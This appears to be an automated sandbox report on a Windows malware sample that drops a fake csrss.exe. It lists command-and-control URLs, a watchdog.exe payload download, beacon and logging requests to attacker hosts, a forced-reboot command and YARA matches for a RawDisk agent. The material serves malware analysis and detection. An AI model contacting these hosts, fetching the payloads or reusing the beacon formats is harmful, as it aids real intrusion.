Source: 1dyvctHqv1.exe, 00000000.00000003.288501264.0000000005C6A000.00000004.00000001.sdmp, 1dyvctHqv1.exe, 0000000C.00000003.308140733.0000000005E2A000.00000004.00000001.sdmp, csrss.exe, 00000011.00000003.333882366.000000000638A000.00000004.00000001.sdmp, csrss.exe, 0000001F.00000003.374819187.000000000638A000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.416342810.0000000005700000.00000040.00000001.sdmp, csrss.exe, 00000027.00000003.375600027.000000000638A000.00000004.00000001.sdmp, csrss.exe, 00000032.00000002.439042588.00000000009F9000.00000040.00020000.sdmp	String found in binary or memory: http://crl.globalsign.net/primobject.crl0
Source: csrss.exe, csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp	String found in binary or memory: http://devlog.gregarius.net/docs/ua)Links
Source: csrss.exe	String found in binary or memory: http://gais.cs.ccu.edu.tw/robot.php)Gulper
Source: csrss.exe, 00000011.00000003.379401154.0000000016ACC000.00000004.00000001.sdmp, csrss.exe, 00000011.00000003.381033593.000000001694A000.00000004.00000001.sdmp	String found in binary or memory: http://gohnot.com/546468561c5f48a95f3eb178d8283c2e
Source: csrss.exe, 00000011.00000002.560620268.0000000016956000.00000004.00000001.sdmp	String found in binary or memory: http://gohnot.com/546468561c5f48a95f3eb178d8283c2e/watchdog.exe
Source: csrss.exe, 00000011.00000003.379401154.0000000016ACC000.00000004.00000001.sdmp	String found in binary or memory: http://gohnot.com/546468561c5f48a95f3eb178d8283c2e/watchdog.exeH
Source: csrss.exe, 00000011.00000003.379401154.0000000016ACC000.00000004.00000001.sdmp	String found in binary or memory: http://gohnot.com/546468561c5f48a95f3eb178d8283c2ec
Source: csrss.exe	String found in binary or memory: http://grub.org)Mozilla/5.0
Source: csrss.exe	String found in binary or memory: http://help.ya
Source: 1dyvctHqv1.exe, 00000000.00000002.297249068.0000000000A59000.00000040.00020000.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.325330645.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.558250482.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.375404564.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.419236138.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.403570364.0000000000A59000.00000040.00020000.sdmp	String found in binary or memory: http://https://_bad_pdb_file.pdb
Source: csrss.exe, csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp	String found in binary or memory: http://ip-api.com/jsonhttp://localhost:3433/icarus.tetradrachm.netidna:
Source: csrss.exe	String found in binary or memory: http://misc.yahoo.com.cn/he
Source: csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp	String found in binary or memory: http://newscommer.com/app/app.exe
Source: csrss.exe	String found in binary or memory: http://search.msn.com/msnb
Source: csrss.exe, csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp	String found in binary or memory: http://search.msn.com/msnbot.htm)msnbot/1.1
Source: csrss.exe, csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp	String found in binary or memory: http://search.msn.com/msnbot.htm)net/http:
Source: 1dyvctHqv1.exe, 00000000.00000002.299005665.0000000004FE0000.00000040.00000001.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.324236877.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.555649640.0000000005700000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.374222629.0000000005FB0000.00000004.00000001.sdmp, csrss.exe, 00000021.00000003.362473269.0000000005FB0000.00000004.00000001.sdmp, csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp	String found in binary or memory: http://search.msn.com/msnbot.htm)pkcs7:
Source: csrss.exe	String found in binary or memory: http://www.alexa.com/help/webmasters;
Source: csrss.exe	String found in binary or memory: http://www.archive.org/details/archive.org_bot)Opera/9.80
Source: csrss.exe, csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp	String found in binary or memory: http://www.avantbrowser.com)MOT-V9mm/00.62
Source: csrss.exe	String found in binary or memory: http://www.baidu.com/search/spide
Source: 1dyvctHqv1.exe, 00000000.00000002.299005665.0000000004FE0000.00000040.00000001.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.324236877.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.555649640.0000000005700000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.374222629.0000000005FB0000.00000004.00000001.sdmp, csrss.exe, 00000021.00000003.362473269.0000000005FB0000.00000004.00000001.sdmp, csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp	String found in binary or memory: http://www.baidu.com/search/spider.htm)MobileSafari/600.1.4
Source: svchost.exe, 00000008.00000002.312836660.00000168B0C13000.00000004.00000001.sdmp	String found in binary or memory: http://www.bingmapsportal.com
Source: csrss.exe	String found in binary or memory: http://www.bloglines.com)F
Source: csrss.exe	String found in binary or memory: http://www.everyfeed.c
Source: csrss.exe	String found in binary or memory: http://www.exabot.com/go/robot)Opera/9.80
Source: csrss.exe	String found in binary or memory: http://www.google.com/adsbot.html)Encountered
Source: csrss.exe	String found in binary or memory: http://www.google.com/bot.html)Mozilla/5.0
Source: csrss.exe	String found in binary or memory: http://www.google.com/bot.html)tls:
Source: csrss.exe	String found in binary or memory: http://www.google.com/feedfetcher.html)HKLM
Source: csrss.exe	String found in binary or memory: http://www.googlebot.com/bot.html)Links
Source: csrss.exe	String found in binary or memory: http://www.spidersoft.com)Wget/1.9
Source: csrss.exe	String found in binary or memory: http://yandex.com/bots)Opera/9.51
Source: csrss.exe	String found in binary or memory: http://yandex.com/bots)Opera/9.80
Source: svchost.exe, 00000005.00000002.550174862.000001B888243000.00000004.00000001.sdmp	String found in binary or memory: https://%s.dnet.xboxlive.com
Source: svchost.exe, 00000005.00000002.550174862.000001B888243000.00000004.00000001.sdmp	String found in binary or memory: https://%s.xboxlive.com
Source: svchost.exe, 00000005.00000002.550174862.000001B888243000.00000004.00000001.sdmp	String found in binary or memory: https://activity.windows.com
Source: svchost.exe, 00000008.00000003.312041280.00000168B0C61000.00000004.00000001.sdmp	String found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
Source: csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp	String found in binary or memory: https://blockchain.infoindex
Source: svchost.exe, 00000005.00000002.550174862.000001B888243000.00000004.00000001.sdmp	String found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 00000005.00000002.550174862.000001B888243000.00000004.00000001.sdmp	String found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 00000008.00000003.312062556.00000168B0C4A000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000008.00000002.312909826.00000168B0C5D000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 00000008.00000003.312041280.00000168B0C61000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 00000008.00000002.312879407.00000168B0C3E000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: svchost.exe, 00000008.00000002.312909826.00000168B0C5D000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Traffic/Incidents/
Source: svchost.exe, 00000008.00000003.312041280.00000168B0C61000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 00000008.00000002.312895544.00000168B0C53000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: svchost.exe, 00000008.00000002.312858607.00000168B0C29000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: svchost.exe, 00000008.00000002.312909826.00000168B0C5D000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 00000008.00000003.312041280.00000168B0C61000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
Source: svchost.exe, 00000008.00000002.312879407.00000168B0C3E000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: svchost.exe, 00000008.00000003.312041280.00000168B0C61000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 00000008.00000003.312041280.00000168B0C61000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
Source: svchost.exe, 00000008.00000003.312041280.00000168B0C61000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 00000008.00000002.312884679.00000168B0C43000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 00000008.00000002.312884679.00000168B0C43000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
Source: svchost.exe, 00000008.00000003.312041280.00000168B0C61000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
Source: svchost.exe, 00000008.00000002.312909826.00000168B0C5D000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: svchost.exe, 00000008.00000003.312062556.00000168B0C4A000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
Source: svchost.exe, 00000008.00000002.312909826.00000168B0C5D000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000008.00000002.312909826.00000168B0C5D000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000008.00000002.312895544.00000168B0C53000.00000004.00000001.sdmp, svchost.exe, 00000008.00000002.312884679.00000168B0C43000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.t
Source: svchost.exe, 00000008.00000003.312041280.00000168B0C61000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
Source: svchost.exe, 00000008.00000002.312879407.00000168B0C3E000.00000004.00000001.sdmp	String found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000008.00000003.290110076.00000168B0C32000.00000004.00000001.sdmp	String found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: csrss.exe	String found in binary or memory: https://raw.githubusercontent.com/spesmilo/electrum/master/electrum/servers.jsontls:
Source: 1dyvctHqv1.exe, 00000000.00000002.302722905.00000000160C4000.00000004.00000001.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.332227986.0000000016052000.00000004.00000001.sdmp, csrss.exe, 00000011.00000002.559249762.0000000016804000.00000004.00000001.sdmp, csrss.exe, 0000001F.00000002.412194328.00000000168BC000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.421794199.0000000016852000.00000004.00000001.sdmp, csrss.exe, 00000027.00000002.420984157.0000000016810000.00000004.00000001.sdmp	String found in binary or memory: https://retoti.com
Source: csrss.exe, csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp	String found in binary or memory: https://retoti.comidentifier
Source: csrss.exe, 00000011.00000002.559249762.0000000016804000.00000004.00000001.sdmp	String found in binary or memory: https://runmodes.com/api/log
Source: csrss.exe, 00000011.00000003.381724707.00000000168AC000.00000004.00000001.sdmp	String found in binary or memory: https://runmodes.com/api/log3633e481-2f88-4842-b7ba-c5d7e0cc011f.uuid.trumops.com
Source: csrss.exe, 00000011.00000002.561078714.0000000016A88000.00000004.00000001.sdmp, csrss.exe, 00000011.00000002.559249762.0000000016804000.00000004.00000001.sdmp	String found in binary or memory: https://server3.trumops.com
Source: csrss.exe, 00000011.00000002.560620268.0000000016956000.00000004.00000001.sdmp	String found in binary or memory: https://server3.trumops.com/api/cdn?c=e3acbc4a527610e5&uuid=3633e481-2f88-4842-b7ba-c5d7e0cc011f
Source: csrss.exe, 00000011.00000003.381350341.0000000016910000.00000004.00000001.sdmp	String found in binary or memory: https://server3.trumops.com/api/poll
Source: csrss.exe, 00000011.00000002.560072123.00000000168E6000.00000004.00000001.sdmp	String found in binary or memory: https://server3.trumops.com/api/poll62
Source: csrss.exe, 00000011.00000003.381350341.0000000016910000.00000004.00000001.sdmp	String found in binary or memory: https://server3.trumops.com/api/pollserver3.trumops.com
Source: csrss.exe, 00000011.00000003.380949672.0000000016964000.00000004.00000001.sdmp	String found in binary or memory: https://server3.trumops.com/bots/post-ia-data?uuid=3633e481-2f88-4842-b7ba-c5d7e0cc011f
Source: csrss.exe, 00000011.00000002.560806655.00000000169E8000.00000004.00000001.sdmp	String found in binary or memory: https://server3.trumops.com3server3.trumops.com:443server3.trumops.com:443ontcpserver3.trumops.com
Source: csrss.exe, 00000011.00000002.561078714.0000000016A88000.00000004.00000001.sdmp	String found in binary or memory: https://server3.trumops.comc=e3acbc4a527610e5&uuid=server3.trumops.com:443server3.trumops.com:443tcp
Source: csrss.exe, 00000011.00000003.380425564.00000000169E8000.00000004.00000001.sdmp	String found in binary or memory: https://server3.trumops.comserver3.trumops.com:443server3.trumops.com:443tcpserver3.trumops.com
Source: csrss.exe, 00000011.00000002.561078714.0000000016A88000.00000004.00000001.sdmp, csrss.exe, 00000011.00000003.379621696.0000000016A86000.00000004.00000001.sdmp	String found in binary or memory: https://server3.trumops.comserver3.trumops.com:443server3.trumops.com:443tcpserver3.trumops.comT
Source: csrss.exe, csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp	String found in binary or memory: https://sitescore.aiValue
Source: svchost.exe, 00000008.00000002.312879407.00000168B0C3E000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
Source: svchost.exe, 00000008.00000002.312879407.00000168B0C3E000.00000004.00000001.sdmp, svchost.exe, 00000008.00000002.312836660.00000168B0C13000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
Source: svchost.exe, 00000008.00000003.290110076.00000168B0C32000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000008.00000003.312103721.00000168B0C41000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000008.00000002.312858607.00000168B0C29000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
Source: svchost.exe, 00000008.00000003.290110076.00000168B0C32000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
Source: svchost.exe, 00000008.00000002.312836660.00000168B0C13000.00000004.00000001.sdmp	String found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen.virtua
Source: 1dyvctHqv1.exe, 00000000.00000002.302722905.00000000160C4000.00000004.00000001.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.332227986.0000000016052000.00000004.00000001.sdmp, csrss.exe, 00000011.00000002.559317775.0000000016838000.00000004.00000001.sdmp, csrss.exe, 00000011.00000002.559249762.0000000016804000.00000004.00000001.sdmp, csrss.exe, 0000001F.00000002.412194328.00000000168BC000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.421794199.0000000016852000.00000004.00000001.sdmp, csrss.exe, 00000027.00000002.420984157.0000000016810000.00000004.00000001.sdmp	String found in binary or memory: https://trumops.com
Source: csrss.exe	String found in binary or memory: https://trumops.com/api/install-failureinvalid
Source: 1dyvctHqv1.exe, 00000000.00000002.302703514.00000000160BA000.00000004.00000001.sdmp	String found in binary or memory: https://trumops.comServiceVersionServiceVersionServersVersionServersVersionDistributorIDCampaignIDOS
Source: csrss.exe, 00000011.00000002.559249762.0000000016804000.00000004.00000001.sdmp	String found in binary or memory: https://trumops.comhttps://retoti.com
Source: csrss.exe, 00000011.00000002.559249762.0000000016804000.00000004.00000001.sdmp	String found in binary or memory: https://trumops.comhttps://retoti.comS-1-5-21-3853321935-2125563209-4053062332-1002
Source: 1dyvctHqv1.exe, 0000000C.00000002.332227986.0000000016052000.00000004.00000001.sdmp, csrss.exe, 0000001F.00000002.412194328.00000000168BC000.00000004.00000001.sdmp, csrss.exe, 00000027.00000002.420984157.0000000016810000.00000004.00000001.sdmp	String found in binary or memory: https://trumops.comhttps://retoti.comServiceVersionServersVersionDistributorIDCampaignIDOSCaptionMic
Source: csrss.exe, 00000021.00000002.421794199.0000000016852000.00000004.00000001.sdmp	String found in binary or memory: https://trumops.comhttps://retoti.comServiceVersionServersVersionDistributorIDDelegateExecuteC:
Source: 1dyvctHqv1.exe, 00000000.00000002.302722905.00000000160C4000.00000004.00000001.sdmp	String found in binary or memory: https://trumops.comhttps://retoti.comhttps://trumops.comhttps://retoti.comFirstInstallDateFirstInsta
Source: 1dyvctHqv1.exe, 0000000C.00000002.332244873.0000000016058000.00000004.00000001.sdmp, csrss.exe, 0000001F.00000002.412239285.00000000168D0000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.421820882.0000000016858000.00000004.00000001.sdmp, csrss.exe, 00000027.00000002.421014108.0000000016814000.00000004.00000001.sdmp	String found in binary or memory: https://trumops.comhttps://retoti.comhttps://trumops.comhttps://retoti.comS-1-5-21-3853321935-212556
Source: 1dyvctHqv1.exe, 00000000.00000002.299005665.0000000004FE0000.00000040.00000001.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.324236877.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.555649640.0000000005700000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.374222629.0000000005FB0000.00000004.00000001.sdmp, csrss.exe, 00000021.00000003.362473269.0000000005FB0000.00000004.00000001.sdmp, csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp	String found in binary or memory: https://trumops.comif-unmodified-sinceillegal
Source: csrss.exe, csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp	String found in binary or memory: https://turnitin.com/robot/crawlerinfo.html)gentraceback

Source: unknown

DNS traffic detected: queries for: trumops.com

Source: global traffic	HTTP traffic detected: GET /api/cdn?c=e3acbc4a527610e5&uuid=3633e481-2f88-4842-b7ba-c5d7e0cc011f HTTP/1.1Host: server3.trumops.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /546468561c5f48a95f3eb178d8283c2e/watchdog.exe HTTP/1.1Host: gohnot.comUser-Agent: Go-http-client/1.1Uuid: 3633e481-2f88-4842-b7ba-c5d7e0cc011fVersion: 183Accept-Encoding: gzip

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 11 Nov 2021 19:35:29 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closex-powered-by: PHP/8.0.11CF-Cache-Status: DYNAMICExpect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vGS1xEh6LbXXdYk%2FUfHE3K9XHXOXdwE2lHJOtvHYtcyT5%2B9kHA7Kf8RkH5w6ASVjA0fcvzY3WJWPHRIBYbMyJfOmx%2B%2B35yaFyw7TA7MtjOV6VQ0xWJeJ4Ed3IWRwWuyLAm82%2ByYm"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6ac9f6ca9af1e660-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 11 Nov 2021 19:35:37 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closex-powered-by: PHP/8.0.11set-cookie: PHPSESSID=4vldu1scrrpcspdhkuu3ka9fnh; path=/; HttpOnlyexpires: Thu, 19 Nov 1981 08:52:00 GMTcache-control: no-store, no-cache, must-revalidatepragma: no-cacheaccess-control-allow-credentials: falseCF-Cache-Status: DYNAMICExpect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=w%2FSRTvKYrEtJCgQJudOl4mEoCl42VZ21LylxF13UV71mdnMd%2Faol5Yp5pxSj%2BswODdLCYMP3eIVPFa9sl85XFuj0UouYrZCuOS%2F8WKEjt3rSe9oezdyQjMbllAbT3Q1v10BSBKd1"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6ac9f6fbaafd743b-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 11 Nov 2021 19:37:02 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closex-powered-by: PHP/8.0.11set-cookie: PHPSESSID=6afjhtvjo4rm2efnl9dt7t1rk1; path=/; HttpOnlyexpires: Thu, 19 Nov 1981 08:52:00 GMTcache-control: no-store, no-cache, must-revalidatepragma: no-cacheaccess-control-allow-credentials: falseCF-Cache-Status: DYNAMICExpect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=YMbRGgJ2bGzGIGIXFb6v9e0wG%2BKBDHlgxtgTlLO5TOltDXIejwxR2ouZvDu5%2Fv1UgpfK778TuEaeYtjU0gQYezCTHP9oV9kTVjAZlULy%2BV9gDKFrggPJhGhvlZQtlD%2FEDY7zfduX"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6ac9f90c5a1b779d-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400

Source: csrss.exe	String found in binary or memory: .30 Version/10.61facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)tls: received unexpected handshake message of type %T when waiting for %TBlackBerry7100i/4.1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/103Mozilla/5.0 (Windows NT equals www.facebook.com (Facebook)
Source: csrss.exe	String found in binary or memory: lla/5.0 (compatible; Konqueror/3.3; Linux 2.6.8-gentoo-r3; X11;facebookscraper/1.0( http://www.facebook.com/sharescraper_help.php)2695994666715063979466701508701962594045780771442439172168272236806126959946667150639794667015087019630673557916260026308143510066 equals www.facebook.com (Facebook)

Source: unknown

HTTP traffic detected: POST /api/log HTTP/1.1Host: runmodes.comUser-Agent: Go-http-client/1.1Content-Length: 144Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzip

System Summary:

Uses shutdown.exe to shutdown or reboot the system

Show sources

Source: C:\Windows\rss\csrss.exe

Process created: C:\Windows\SysWOW64\shutdown.exe shutdown -r -t 5

Source: C:\Windows\System32\svchost.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 5384 -ip 5384

Source: 1dyvctHqv1.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 1dyvctHqv1.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: csrss.exe.12.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: csrss.exe.12.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Windows\System32\svchost.exe	Section loaded: xboxlivetitleid.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cdpsgshims.dll			Jump to behavior

Source: 1dyvctHqv1.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: 52.2.csrss.exe.9ab080.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 31.2.csrss.exe.9ab080.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 52.3.csrss.exe.655bce0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 50.2.csrss.exe.5ca4f30.9.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 52.3.csrss.exe.65540e0.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 12.2.1dyvctHqv1.exe.9a56e0.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 39.2.csrss.exe.9ab080.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 0.2.1dyvctHqv1.exe.9ab080.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 17.2.csrss.exe.9a56e0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
Source: 12.3.1dyvctHqv1.exe.5ff40e0.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
